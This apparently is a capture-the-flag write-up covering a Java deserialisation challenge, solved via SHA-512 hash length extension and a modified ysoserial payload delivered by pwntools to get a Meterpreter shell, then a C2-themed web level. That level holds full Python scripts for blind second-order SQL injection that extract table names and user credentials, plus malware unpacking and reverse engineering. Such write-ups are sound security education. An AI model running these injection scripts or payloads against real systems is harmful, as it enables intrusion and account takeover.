Things that don't make logical sense can safely be ignored.

Do not eat that tiny Hello Kitty.”

This is nonsense to us, so you're on your own from here on out.

As described in the invitation letter, the challenge ran the final Java application a-mad-tea-party on localhost port 4714.

[Cake Designer Interface v4.2.1]
  1. Set Name.
  2. Set Candles.
  3. Set Caption.
  4. Set Flavour.
  5. Add Firework.
  6. Add Decoration.

  7. Cake to Go.
  8. Go to Cake.
  9. Eat Cake.

  0. Leave the Party.

[Your cake so far:]

name: "A Plain Cake"
candles: 31337
flavour: "Vanilla"

Based on the source code of the application at tea-party/src/main/java/com/mad/hatter/App.java, I decided that the most likely exploit vector was the “Eat Cake” option, which would deserialise the fireworks byte array into a Firework object before executing firework.fire():

case 9:
    System.out.println("You eat the cake and you feel good!");

    for (Cake.Decoration deco : cakep.getDecorationsList()) {
        if (deco == Cake.Decoration.TINY_HELLO_KITTY) {
            running = false;
            System.out.println("A tiny Hello Kitty figurine gets lodged in your " +
                    "throat. You get very angry at this and storm off.");
            break;
        }
    }

    if (cakep.getFireworksCount() == 0) {
        System.out.println("Nothing else interesting happens.");
    } else {
        for (ByteString firework_bs : cakep.getFireworksList()) {
            byte[] firework_data = firework_bs.toByteArray();
            Firework firework = (Firework) conf.asObject(firework_data);    // deserialisation
            firework.fire();
        }
    }
    break;

I believed this was the exploit vector because Java deserialisation was an infamous code execution method. However, I could not add a deserialisation payload using “Add a Firework” because it only allowed me to select from a pre-set list of fireworks.

Which firework do you wish to add?

  1. Firecracker.
  2. Roman Candle.
  3. Firefly.
  4. Fountain.

Firework: 1
Firework added!

[Cake Designer Interface v4.2.1]
  1. Set Name.
  2. Set Candles.
  3. Set Caption.
  4. Set Flavour.
  5. Add Firework.
  6. Add Decoration.

  7. Cake to Go.
  8. Go to Cake.
  9. Eat Cake.

  0. Leave the Party.

[Your cake so far:]

name: "A Plain Cake"
candles: 31337
flavour: "Vanilla"
fireworks: "\000\001\032com.mad.hatter.Firecracker\000"

These fireworks had unexciting payloads, as seen in Firefly.java:

package com.mad.hatter;

public class Firefly extends Firework {

    static final long serialVersionUID = 45L;

    public void fire() {
        System.out.println("Firefly! Firefly! Firefly! Firefly! Fire Fire Firefly!");
    }

}

Meanwhile, the “Cake to Go” option exported my current cake in the format {"cake":"<HEX(BASE64(PROTOBUF serialisED CAKE DATA))>","digest":"<ENCRYPTED HASH>"}.

Choice: 7
Here's your cake to go:
{"cake":"<CAKE DATA>","digest":"<DIGEST>"}

I could also import cakes with the “Go to Cake” option.

Choice: 8
Please enter your saved cake: {"cake":""<CAKE DATA>","digest":"<DIGEST>"}
Cake successfully gotten!

[Cake Designer Interface v4.2.1]
  1. Set Name.
  2. Set Candles.
  3. Set Caption.
  4. Set Flavour.
  5. Add Firework.
  6. Add Decoration.

  7. Cake to Go.
  8. Go to Cake.
  9. Eat Cake.

  0. Leave the Party.

[Your cake so far:]

name: "A Plain Cake"
candles: 31337
flavour: "Vanilla"
fireworks: "\000\001\032com.mad.hatter.Firecracker\000"

This looked like a good way to smuggle my own Firework data. However, the source code revealed that the application properly validated the digest value using a SHA-512 hash.

case 8:

    System.out.print("Please enter your saved cake: ");

    scanner.nextLine();
    String saved = scanner.nextLine().trim();

    try {

        HashMap<String, String> hash_map = new HashMap<String, String>();
        hash_map = (new Gson()).fromJson(saved, hash_map.getClass());
        byte[] challenge_digest = Hex.decodeHex(hash_map.get("digest"));
        byte[] challenge_cake_b64 = Hex.decodeHex(hash_map.get("cake"));
        byte[] challenge_cake_data = Base64.decodeBase64(challenge_cake_b64);

        MessageDigest md = MessageDigest.getInstance("SHA-512");
        byte[] combined = new byte[secret.length + challenge_cake_b64.length];
        System.arraycopy(secret, 0, combined, 0, secret.length);
        System.arraycopy(challenge_cake_b64, 0, combined, secret.length,
                challenge_cake_b64.length);
        byte[] message_digest = md.digest(combined);

        if (Arrays.equals(message_digest, challenge_digest)) {
            Cake new_cakep = Cake.parseFrom(challenge_cake_data);
            cakep.clear();
            cakep.mergeFrom(new_cakep);
            System.out.println("Cake successfully gotten!");
        }
        else {
            System.out.println("Your saved cake went really bad...");
        }

In order to forge my own arbitrary cake data, I needed to pass this check. I found a great Dragon CTF 2019 writeup that covered a similar challenge involving protobuf-serialised data and an MD5 hash verification. However, while MD5 collisions are easy to create, this application used SHA-512 which would be impossible in theory to brute force or collide – not that it stopped me from trying. After many fruitless attempts at cracking the hash, I pondered the challenge description again. “Things that don't make logical sense can safely be ignored” clearly warned me against taking on the impossible like cracking SHA-512. But what did “Sometimes the end of a tale might not be the end of the story” mean?

After several more hours of aimless wandering, I found a StackExchange discussion about breaking SHA-512. One of the answers struck me:

Are there any successful attacks out there?

No, except length extension attacks, which are possible on any unaltered or extended Merkle-Damgard hash construction (SHA-1, MD5 and many others, but not SHA-3 / Keccak). If that's a problem depends on how the hash is used. In general, cryptographic hashes are not considered broken just because they suffer from length extension attacks.

Length extension attacks... “Sometimes the end of a tale might not be the end of the story”... I facepalmed for probably the hundredth time in the competition.

The application prepended a salt (the secret variable) to the base64-encoded cake data, then generated a SHA-512 hash of the concatenated string. Furthermore, the source code revealed the length of secret:

public static byte[] get_secret() throws IOException {
    // Read the secret from /home/hatter/secret.
    byte[] data = FileUtils.readFileToByteArray(new File("/home/hatter/secret"));
    if (data.length != 32) {
        System.out.println("Secret does not match the right length!");
    }
    return data;
}

This was a classic setup for a hash extension attack. I won't re-hash the explanation – there is a hash_extender repository on GitHub that breaks down this attack. Even better, it includes a tool to perform the hash extension attack on several hash algorithms, including SHA-512. Thanks, Ron Bowes!

I generated a test payload to append candle = 1 in Protobuf format to the data I had previously exported using the Cake to Go function.

> hash_extender/hash_extender -l 32 -d CgAQACIA -s <ORIGINAL HASH> -f sha512 -a EAE=
> <FORGED MESSAGE DIGEST>

I tested the modified JSON by importing it into the application using the Go to Cake function.

Please enter your saved cake: {"cake":"<CAKE DATA>","digest":"<DIGEST>"}
{"cake":"<CAKE DATA>","digest":"<DIGEST>"}
Cake successfully gotten!

[Cake Designer Interface v4.2.1]
  1. Set Name.
  2. Set Candles.
  3. Set Caption.
  4. Set Flavour.
  5. Add Firework.
  6. Add Decoration.

  7. Cake to Go.
  8. Go to Cake.
  9. Eat Cake.

  0. Leave the Party.

[Your cake so far:]

name: ""
candles: 1
flavour: ""

Great success!

After confirming that the hash length extension attack allowed me to forge my own cake data, I moved on to generate a deserialisation payload. ysoserial appeared to be the obvious tool of choice, but according to the pom.xml manifest, the application only imported commons-beanutils whereas the ysoserial CommonsBeanutils1 payload required commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2. Fortunately, after checking some of the pull requests for the repository, I discovered one that removed the additional dependencies. Pumped with excitement, I cloned the repo, modified the code based on the pull request, generated my payload, and sent my hash-extended data. It didn't work.

Checking the error messages, I realised to my horror that the application did not use the standard ObjectInputStream deserialisation. Instead, it was using the FST library to serialise and deserialise payloads and thus required a completely different serialisation format. To get the ysoserial payload to work, I modified the tool's source code in GeneratePayload.java to use FST instead of ByteArrayOutputStream.

public class GeneratePayload {
	private static final int INTERNAL_ERROR_CODE = 70;
	private static final int USAGE_CODE = 64;

	static FSTConfiguration conf = FSTConfiguration.createDefaultConfiguration();

    ...

		try {
			final ObjectPayload payload = payloadClass.newInstance();
			final Object object = payload.getObject(command);
			PrintStream out = System.out;
			byte[] payload_data = conf.asByteArray(object);
			FileOutputStream outputStream = new FileOutputStream("payload.hex");
			outputStream.write(payload_data);

I re-compiled ysoserial, generated my payload, and sent it off. However, it crashed again when entering my JSON payload. What went wrong? Looking at the error messages, I realised that the program cut off my input at 4096 bytes. This was because the code used scanner.nextLine() to accept input, which was limited to 4096 bytes at a time. At my wits' end, I made a last-ditch attempt by port forwarding the application via my Meterpreter shell, then used pwntools to send the input directly instead of copying and pasting my payload.

from pwn import *

## p = process(['java', '-jar','opt/wonderland/a-mad-tea-party/tea-party/target/tea-party-1.0-SNAPSHOT.jar'])
p = remote('<IP ADDRESS>', 4445)

print(p.recvuntil("Invitation Code:"))
p.sendline(b'<INVITATION CODE>')
print(p.recvuntil("Choice:"))
p.sendline(b'8')
p.sendline(b'{"cake":"<CAKE DATA>","digest":"<DIGEST>"}')

p.interactive()

To my huge relief, it worked and I got my Meterpreter shell! I was finally at the end of this long rabbit hole. Take a bow!

Success

TISC{W3_y4wN_A_Mor3_r0m4N_w4y}

Level 10: Malware for UwU

Domains: Web, Binary Exploitation (Windows Shellcoding), Reverse Engineering, Cryptography

We've found a PALINDROME webserver, suspected to be the C2 Server of a newly discovered malware! Get the killswitch from the bot masters before the malware goes live!

May the Force (not brute force) be with UwU!

http://18.142.2.80:18080/

The final countdown! I headed to the website which featured a simple login page.

I could register as a user without any problems.

After registering, I logged in to a simple dashboard.

Normal User

The beautiful bird image was in fact a huge series of styled <span> elements.

<span class="ascii" style="display:inline-block;white-space:pre;letter-spacing:0;line-height:1;font-family:'BitstreamVeraSansMono','CourierNew',Courier,monospace;font-size:16px;border-width:1px;border-style:solid;border-color:lightgray;">
    <span style="background-color:#d7875f;color: #d7af87;">|</span>
    <span style="background-color:#d7875f;color: #af5f00;">|</span>
    <span style="background-color:#d7875f;color: #af5f00;">|</span><
    ...
</span>

Since the original domain description for this level omitted Web, I suspected this was a Cryptography challenge and got tangled up trying to analyse the hexadecimal colour values. After several fruitless hours, I clarified this with the organisers and they corrected the domain list to include Web. This prompted me to look for Web attack vectors instead. The “Contact your PALINDROME admin for further instructions!” text suggested that an admin user account existed so I began looking for a possible SQL injection. At first, I thought that the login form was vulnerable because sending %27+OR+%27 in the password field caused the response to drop. However, I eventually decided that this was a deliberate red herring because %27+OR++%27, which should have been interpreted the same as %27+OR+%27 in SQL syntax, did not drop the response.

Moving on, I noticed something interesting when I added a single quote to all of the form values while registering a new user.

POST /new_user.php HTTP/1.1
Host: <IP ADDRESS>:18080
Content-Length: 146
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://<IP ADDRESS>:18080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.44
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

username=johndoe'&password=johndoe'&recovery_q1=Q1'&recovery_a1=johndoe'&recovery_q2=Q2'&recovery_a2=johndoe'&recovery_q3=Q4'&recovery_a3=johndoe'

When I tried to reset the user's password with recovery questions, the password reset self-service correctly fetched the user but failed to fetch any of the recovery questions.

Bugged Password Reset

This suggested that an SQL injection had occurred in the SQL statement fetching the user's recovery questions. I guessed that the statement partly resembled select question_text from recovery_questions where recovery_id = '<UNSANITISED VALUE OF recovery_q1 FROM REGISTRATION>'. As such, I could exploit a two-step SQL injection by signing up with the SQL payload in the recovery_q1 parameter, then retrieving the result at the user's password reset page. Unfortunately, after further testing I discovered that the application ran a filter on UNION in my payload that prevented me from directly leaking additional strings; all UNION payloads failed even though typical ' AND '1'='1 injections worked. Furthermore, the SELECT INTO OUTFILE remote code execution vector also failed. Instead, I relied on boolean-based output. If my injected statements evaluated to true, the password reset page would correctly fetch the user's recovery question text. If they evaluated to false, the recovery question text would be missing.

This required massive numbers of registration and password reset requests, forcing me to automate my SQL injection. I used GUIDs for the usernames to avoid collisions in registration. My first order of business was to enumerate the table names. I leaked the number of tables and then retrieved the names of the last few tables to ensure that they were user-created rather than system tables.

import requests
import uuid
import string

NEW_USER_URL = 'http://<IP ADDRESS>:18080/new_user.php'
FORGOT_PASSWORD_URL = 'http://<IP ADDRESS>:18080/forgot_password.php'
CANDIDATE_LETTERS = string.printable

## Get number of tables
## 63
## appdb
def leak_table_count():
    count = 0
    found = False
    while not found:
        username = uuid.uuid4().hex
        payload = {
            'username': username, 
            'password': username,
            'recovery_q1': 'Q1',
            'recovery_a1': username,
            'recovery_q2': 'Q2',
            'recovery_a2': username,
            'recovery_q3': 'Q3',
            'recovery_a3': username
        }

        payload['recovery_q1'] = "Q1' AND ((SELECT COUNT(*) from information_schema.tables)='{}')#".format(count)
        r = requests.post(NEW_USER_URL, data=payload)
        # print(r.text)
        if 'New UwUser registered!' in r.text:
            print("CREATED USER WITH PAYLOAD {}".format(payload))
        else:
            print("FAILED TO CREATE USER WITH PAYLOAD {}".format(payload))
            exit(-1)
        r = requests.post(FORGOT_PASSWORD_URL, data={'username': username})
        if 'What was the name of your best frenemy in the Palindrome Academy?' in r.text:
            print("CANDIDATE SUCCESS")
            found = True
        else:
            print("CANDIDATE FAILED")
            # exit(-1)
        count += 1

    print("Number of tables: {}".format(count))


## Get table name (start from last few tables to get user tables)
## innodb_sys_tablestats, qnlist, userlist
def leak_table_name(table_number):
    table_name = ''
    found = True
    while found:
        found = False
        for candidate_letter in CANDIDATE_LETTERS:
            username = uuid.uuid4().hex
            payload = {
                'username': username, 
                'password': username,
                'recovery_q1': 'Q1',
                'recovery_a1': username,
                'recovery_q2': 'Q2',
                'recovery_a2': username,
                'recovery_q3': 'Q3',
                'recovery_a3': username
            }

            payload['recovery_q1'] = "Q1' AND (SUBSTRING((SELECT table_name from information_schema.tables LIMIT {}, 1), 1, {})) = BINARY '{}'#".format(table_number, len(table_name) + 1, table_name + candidate_letter)
            r = requests.post(NEW_USER_URL, data=payload)
            # print(r.text)
            if 'New UwUser registered!' in r.text:
                print("CREATED USER WITH PAYLOAD {}".format(payload))
            else:
                print("FAILED TO CREATE USER WITH PAYLOAD {}".format(payload))
                exit(-1)
            r = requests.post(FORGOT_PASSWORD_URL, data={'username': username})
            if 'What was the name of your best frenemy in the Palindrome Academy?' in r.text:
                print("CANDIDATE SUCCESS")
                found = True
                table_name += candidate_letter
                print(table_name)
                break
            else:
                print("CANDIDATE FAILED")
    print(table_name)

Now that I had the table names qnlist and userlist, I retrieved their column names.

## Get concatted column names for the table
## username,pwdhash,usertype,email,recover_q1,recover_a1,recover_q2,recover_a2,recover_q3,recover_a3
## q_tag, q_body
def leak_column_names(table_name):
    column_names = ''
    found = True
    while found:
        found = False
        for candidate_letter in CANDIDATE_LETTERS:
            username = uuid.uuid4().hex
            payload = {
                'username': username, 
                'password': username,
                'recovery_q1': 'Q1',
                'recovery_a1': username,
                'recovery_q2': 'Q2',
                'recovery_a2': username,
                'recovery_q3': 'Q3',
                'recovery_a3': username
            }
            payload['recovery_q1'] = "Q1' AND (SUBSTRING((SELECT group_concat(column_name) FROM information_schema.columns WHERE table_name = '{}'), 1, {})) = BINARY '{}'#".format(table_name, len(column_names) + 1, column_names + candidate_letter)
            r = requests.post(NEW_USER_URL, data=payload)
            # print(r.text)
            if 'New UwUser registered!' in r.text:
                print("CREATED USER WITH PAYLOAD {}".format(payload))
            else:
                print("FAILED TO CREATE USER WITH PAYLOAD {}".format(payload))
                exit(-1)
            r = requests.post(FORGOT_PASSWORD_URL, data={'username': username})
            if 'What was the name of your best frenemy in the Palindrome Academy?' in r.text:
                print("CANDIDATE SUCCESS")
                found = True
                column_names += candidate_letter
                print(column_names)
                break
            else:
                print("CANDIDATE FAILED")
    print(column_names)

usertype suggested that there indeed existed an admin user in the database. I began retrieving all of the users' data.

## Leaks user data (only leak essential columns to takeover)
## TeoYiBoon,3043b513222221993f7ade356f521566,0,[email protected],Q2,Dirty Gorilla,Q6,Mark Zuckerberg,Q7,Fox
## oscarthegrouch,3043b513244444993f7ade356f521566,0,[email protected],Q3,cat recycle bin,Q4,Operation Garbage Can,Q5,5267385
## barney,3043b513244555993f7ade356f521566,0,[email protected],Q1,Major Planet,Q4,Operation Garbage Can,Q7,Purple dinosaur
## rollrick,3043b513244556993f7ade356f521566,0,[email protected],Q2,Rick n Roll,Q3,Operation RICKROLL,Q6,PICKLE RICKKKK
## noobuser,3043b513111111993f7ade356f521566,0,[email protected],Q1,Boba Abob,Q2,Eternal Fuchsia,Q3,Troll your buddy
def leak_user_data(user_number):
    user_data = ''
    found = True

    while found:
        found = False
        for candidate_letter in CANDIDATE_LETTERS:
            username = uuid.uuid4().hex
            payload = {
                'username': username, 
                'password': username,
                'recovery_q1': 'Q1',
                'recovery_a1': username,
                'recovery_q2': 'Q2',
                'recovery_a2': username,
                'recovery_q3': 'Q3',
                'recovery_a3': username
            }
            # CONCAT(username,',',usertype,',',email,',',recover_a1,',',recover_a2,',',recover_a3)
                        # payload['recovery_q1'] = "Q1' AND (SUBSTRING((SELECT CONCAT(HEX(recover_a1),',',HEX(recover_a2),',',HEX(recover_a3)) from userlist LIMIT {}, 1), {}, 1)) = BINARY '{}'#".format(user_number, len(user_data) + 1, candidate_letter) # for my boy c1-admin
            payload['recovery_q1'] = "Q1' AND (SUBSTRING((SELECT CONCAT(recover_a1,',',recover_q2,',',recover_a2,',',recover_q3,',',recover_a3) from userlist LIMIT {}, 1), {}, 1)) = BINARY '{}'#".format(user_number, len(user_data) + 1, candidate_letter)
            r = requests.post(NEW_USER_URL, data=payload)
            # print(r.text)
            # if 'New UwUser registered!' in r.text:
            #     print("CREATED USER WITH PAYLOAD {}".format(payload))
            if not 'New UwUser registered!' in r.text:
                # print("FAILED TO CREATE USER WITH PAYLOAD {}".format(payload))
                exit(-1)
            r = requests.post(FORGOT_PASSWORD_URL, data={'username': username})
            if 'What was the name of your best frenemy in the Palindrome Academy?' in r.text:
                # print("CANDIDATE SUCCESS: {}".format(ord(candidate_letter)))
                found = True
                user_data += candidate_letter
                print(user_data)
                break
            # else:
                # print("CANDIDATE FAILED")
        # break
    print(user_data)

I needed to HEX the fetched user's data because when my script reached the juicy laojiao-c2admin user, it exited early on recovery answer 2, returning X. I suspected that there was some kind of special character in the way. Indeed, the user's answer to What is the name of an up and coming evil genius that inspires you? turned out to be X Æ A-12. Along the way, I modified my script to leak a few additional values and confirmed that the current examdbuser@localhost user lacked FILE permissions. Additionally, I found out that the application sanitised union to onion and sleep to sheep. Eventually, I finished extracting the admin user's data: laojiao-c2admin,1,[null],6-235-35-35,X Æ A-12,Nat Uwu Tan.

I successfully reset laojiao-c2admin's password using the recovery answers and logged in. This time, I encountered the same dashboard with an important change at the bottom – instead of “Contact your PALINDROME admin for further instructions!”, there was a link to download a binary named UwU.exe!

I downloaded UwU.exe and attempted to execute it, but it exited immediately. I opened it in PE-bear and noticed that the .text and .data sections had been replaced by .MPRESS1 and .MPRESS2

PE-bear

I Googled this and found out that this was an indicator that the executable had been packed by the MPRESS packer. There were several tutorials online that described how to manually unpack such executables, but I wanted to try some automated options first. Here's a list of the ones I used.

Avast RetDec: Failed to recognise the MPRESS packing.
unipacker: Managed to unpack but set the original entry point too early so the executable crashed.
QuickUnpack: The OG unpacker. It was difficult to find a working copy and I had to download it in a hermetically sealed VM and take a shower afterwards. Unsurprisingly, this was the only unpacker that worked perfectly.

With the unpacked UwU.exe, I could now easily decompile and debug it.

I executed the binary and was blasted by the song of my people.

UwU Start

Right away, I tried the “Display Killswitch” option and enjoyed another sweet, sweet lullaby but no killswitch flag.

UwU Killswitch

Next, I ran the “Register Bird” option, which prompted me for an IP address and port. I set this to the website's IP address and port and successfully registered. Additionally, this triggered a HTTP request that I retrieved using WireShark.

POST /register.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: UwUserAgent/1.0
Content-Length: 60
Host: <IP ADDRESS>:18080

action=register&a=roVwGx&b=gD4ZuM&c=pFvulv&d=XH2CPq&e=I3Yonk

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2021 16:33:53 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 48
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

oVSFHfzJoQSfTP3PphqGSf7Lug+HTfrSrwHXRv2c9ATWGfma

Next, I selected “Send Message” which accepted a target UwUID and message before sending another HTTP request.

POST /send.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: UwUserAgent/1.0
Content-Length: 28
Host: <IP ADDRESS>:18080

action=send&a=ABCDEF&b=HELLO

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2021 16:35:34 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Finally, I tested “Receive Messages” which continuously sent the following HTTP request every few seconds.

POST /receive.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: UwUserAgent/1.0
Content-Length: 56
Host: <IP ADDRESS>:18080

UwUID=oVSFHfzJoQSfTP3PphqGSf7Lug%2bHTfrSrwHXRv2c9ATWGfma

I also popped the executable into VirusTotal and ANY.RUN to observe more static or dynamic behaviour but did not glean anything new. I moved on to reverse engineering the unpacked executable, starting with the register function.

The binary featured many dead ends. For example, it included unreachable code like this.

  switch ( rand() % 5 )   // actually, none of these will happen right? can safely ignore
  {
    case 44:
      display_logo();
      break;
    case 88:
      display_killswitch();
      break;
    case 132:
      sub_557571D0(v39, e_flat);
      sub_55752C60(v39[0], (int)v39[1], (int)v39[2], (int)v39[3], (int)v39[4], v40);
      break;
    case 176:
      receive_messages(v41);
      break;
    case 220:
      register_bird(v41);
      break;
    case 264:
      send_message(v41);
      break;
    default:
      break;

Additionally, the binary used very few plaintext strings, preferring to decrypt them dynamically. For example, the following function returned the value “Not registered”:

void __thiscall sub_557574E0(_BYTE *this)
{
  unsigned int v1; // ebx
  unsigned int v2; // esi

  if ( this[15] )
  {
    v1 = 0;
    v2 = 0;
    do
    {
      this[v2] ^= 0x5AA5D2B4D39B2B69ui64 >> (8 * (v2 & 7));
      v1 = (__PAIR64__(v1, v2++) + 1) >> 32;
    }
    while ( __PAIR64__(v1, v2) < 0xF );
    this[15] = 0;
  }
}

I decrypted these dynamically by setting breakpoints at the ret instruction and dumping EAX.

The first question I wanted to answer was how the binary generated the seemingly random a, b, c, d, and e parameters in the POST /register.php request. I found the obfuscated loop further down in the main function.

      for ( j = 9; ; j = 1401 )
      {
        while ( j <= 18 )
        {
          if ( j == 18 )
          {
            v34 = mersenne_rng_with_b62(v44);   // generate b parameter
            sub_55757100(v34);
            if ( v46 >= 0x10 )
            {
              v31 = v44[0];
              v32 = v46 + 1;
              if ( v46 + 1 >= 0x1000 )
              {
                v31 = *(_DWORD *)(v44[0] - 4);
                v32 = v46 + 36;
                if ( (unsigned int)(v44[0] - v31 - 4) > 0x1F )
                  goto LABEL_66;
              }
              v40 = v32;
              sub_5575B048(v31);
            }
            j = 4;
          }
          else if ( j == 4 )
          {
            v33 = mersenne_rng_with_b62(v44);   // generate c parameter
            sub_55757100(v33);
            if ( v46 >= 0x10 )
            {
              v31 = v44[0];
              v32 = v46 + 1;
              if ( v46 + 1 >= 0x1000 )
              {
                v31 = *(_DWORD *)(v44[0] - 4);
                v32 = v46 + 36;
                if ( (unsigned int)(v44[0] - v31 - 4) > 0x1F )
                  goto LABEL_66;
              }
              v40 = v32;
              sub_5575B048(v31);
            }
            j = 64;
          }
          else
          {
            v30 = mersenne_rng_with_b62(v44);   // generate a parameter
            sub_55757100(v30);
            if ( v46 >= 0x10 )
            {
              v31 = v44[0];
              v32 = v46 + 1;
              if ( v46 + 1 >= 0x1000 )
              {
                v31 = *(_DWORD *)(v44[0] - 4);
                v32 = v46 + 36;
                if ( (unsigned int)(v44[0] - v31 - 4) > 0x1F )
                  goto LABEL_66;
              }
              v40 = v32;
              sub_5575B048(v31);
            }
            j = 18;
          }
        }
        if ( j != 64 )
          break;
        v36 = mersenne_rng_with_b62(v44);       // generate d parameter
        sub_55757100(v36);
        if ( v46 >= 0x10 )
        {
          v31 = v44[0];
          v32 = v46 + 1;
          if ( v46 + 1 >= 0x1000 )
          {
            v31 = *(_DWORD *)(v44[0] - 4);
            v32 = v46 + 36;
            if ( (unsigned int)(v44[0] - v31 - 4) > 0x1F )
              goto LABEL_66;
          }
          v40 = v32;
          sub_5575B048(v31);
        }
      }
      v35 = mersenne_rng_with_b62(v44);         // generate e parameter

Each parameter was 6 characters selected using a Mersenne Twister pseudo-random number generator algorithm from the base62 alphabet in the mersenne_rng_with_b62 function.

_DWORD *__usercall mersenne_rng_with_b62@<eax>(_DWORD *a1@<ecx>, int a2@<edi>, int a3@<esi>)
{
  _EXCEPTION_REGISTRATION_RECORD *v3; // eax
  void *v4; // esp
  unsigned int seed; // eax
  unsigned int i; // edx
  int v8; // edi
  int extracted_number; // eax
  unsigned int v10; // edx
  unsigned int v11; // ecx
  _DWORD *v12; // eax
  _BYTE *v13; // eax
  char v14; // cl
  int v17; // [esp+0h] [ebp-13CCh] BYREF
  int v18[1259]; // [esp+4h] [ebp-13C8h]
  int v19; // [esp+13B0h] [ebp-1Ch]
  int v20; // [esp+13B4h] [ebp-18h]
  char *base62_alphabet; // [esp+13B8h] [ebp-14h]
  int v22; // [esp+13BCh] [ebp-10h]
  _EXCEPTION_REGISTRATION_RECORD *v23; // [esp+13C0h] [ebp-Ch]
  char *v24; // [esp+13C4h] [ebp-8h]
  int v25; // [esp+13C8h] [ebp-4h]

  v25 = -1;
  v3 = NtCurrentTeb()->NtTib.ExceptionList;
  v24 = byte_5575CBE6;
  v23 = v3;
  v4 = alloca(5056);
  v18[1255] = (int)a1;
  v20 = 0;
  v18[1253] = 62;
  base62_alphabet = (char *)operator new(0x40u);
  v18[1254] = 63;
  v18[1249] = (int)base62_alphabet;
  strcpy(base62_alphabet, "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz");// base62
  v25 = 1;
  seed = std::_Random_device(a2, a3);
  v18[1248] = -1;
  i = 1;
  v18[0] = seed;
  do                                            // Initialise the generator from a seed
  {
    seed = i + 1812433253 * (seed ^ (seed >> 30));// Initialise Mersenne Twister with constant 1812433253
    v18[i++] = seed;
  }
  while ( i < 0x270 );
  *a1 = 0;
  a1[4] = 0;
  a1[5] = 15;
  *(_BYTE *)a1 = 0;
  v17 = 624;
  a1[4] = 0;
  *(_BYTE *)a1 = 0;
  v20 = 1;
  v18[1256] = (int)&v17;
  v8 = 6;
  v18[1257] = 32;
  v18[1258] = -1;
  do
  {
    extracted_number = get_next_mod_62(62);     // Retrieve next Mersenne PRNG number mod 62
    v10 = a1[5];
    v11 = a1[4];
    LOBYTE(v22) = base62_alphabet[extracted_number];    // Used number as offset in base62 alphabet
    if ( v11 >= v10 )
    {
      LOBYTE(v19) = 0;
      sub_557595E0(v11, v19, v22);
    }
    else
    {
      a1[4] = v11 + 1;
      v12 = a1;
      if ( v10 >= 0x10 )
        v12 = (_DWORD *)*a1;
      v13 = (char *)v12 + v11;
      v14 = v22;
      v13[1] = 0;
      *v13 = v14;
    }
    --v8;
  }
  while ( v8 );
  sub_5575B048(base62_alphabet);
  return a1;
}

I recognised the Mersenne Twister due to the presence of constants such as 1812433253. At this point, I fell down another hilarious rabbit hole. Apparently, the constants used by the program's Mersenne Twister matched those used to encrypt several Japanese game files. This led me to a game modder's decryption script that included the following comment:

Gist Comment

UwU indeed. I burned a few more hours chasing this false lead due to my faith in a fellow man of culture. Ultimately, I decided that the program only used the Mersenne Twister to generate random characters and nothing more.

Since these values were indeed (pseudo)randomly generated, perhaps it served as an encryption key for future communications with the server, a common pattern used by C2 frameworks. I tried base62-decrypting the parameters but only got gibberish. Next, I recalled that the dashboard on the website provided five master UwUIDs:

Here is a list of Bot Master UwUIDs:
- 715cf1a6-c0de-4a55-b055-c0ffeec0ffee
- 715cf1a6-baba-4a55-b0b0-c0ffeec0ffee
- 715cf1a6-510b-4a55-ba11-c0ffeec0ffee
- 715cf1a6-dead-4a55-a1d5-c0ffeec0ffee
- 715cf1a6-51de-4a55-be11-c0ffeec0ffee

However, these UwUIDs looked different from the UwUID returned from the registration HTTP request, such as oVSFHfzJoQSfTP3PphqGSf7Lug%2bHTfrSrwHXRv2c9ATWGfma. This base64 string decoded to 36 bytes – the same number of bytes as the Bot Master UwUIDs in plaintext.

Perhaps the base64 string was simply an encoded version of a plaintext UwUID matching the pattern <4 HEX BYTES>-<2 HEX BYTES>-<2 HEX BYTES>-<2 HEX BYTES>-<6 HEX BYTES>. How could I decrypt them though?

I began fuzzing the POST /register.php request with different parameters. I noticed after a while that if I kept the parameters the same but kept repeating the request, I would eventually get the same encrypted UwUID again. Furthermore, after fuzzing too many times, I somehow crashed the encrypted UwUID generator (the organisers had to reset it) and began receiving only MDAwMDA=, which base64-decoded to 00000.

After many failed attempts, I began to wonder if I missed some crucial information. Since I downloaded the binary from http://<IP ADDRESS>:18080/super-secret-palindrome-long-foldername/UwU.exe, I began fuzzing http://<IP ADDRESS>:18080/super-secret-palindrome-long-foldername/<FUZZ>. As it turned out, http://<IP ADDRESS>:18080/super-secret-palindrome-long-foldername/ was a simple directory listing that included README.txt.

Directory Listing

I opened the README and found out what I had been missing.

Congratulations, PALINDROME Member! You are now a proud UwUser of our latest malware, UwU.exe!

Before running the malware on your victim, it is important that the victim is a soft target. Ie, the win10 exploit mitigations should be disabled first (see https://docs.microsoft.com/en-us/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10#table-2configurable-windows-10-mitigations-designed-to-help-protect-against-memory-exploits). Win 8.1 and below are all fair game!

Upon running the malware, you will see several options. Namely:

Register Bird

Send Message

Receive Messages

Display Killswitch

Exit

You should first register the malware (the Bird) with the C2 Server (the Birdwatcher), which is a server such as this one.

After that, you can send and receive messages, to communicate with the other registered Birds! Simply send the message to their UwUIDs (which will be assigned to you upon registering).

Each C2 Server will have several Big Birds as bot masters, which are essentially an identical copy of the malware you've received, but with a special killswitch only available for the Big Birds.

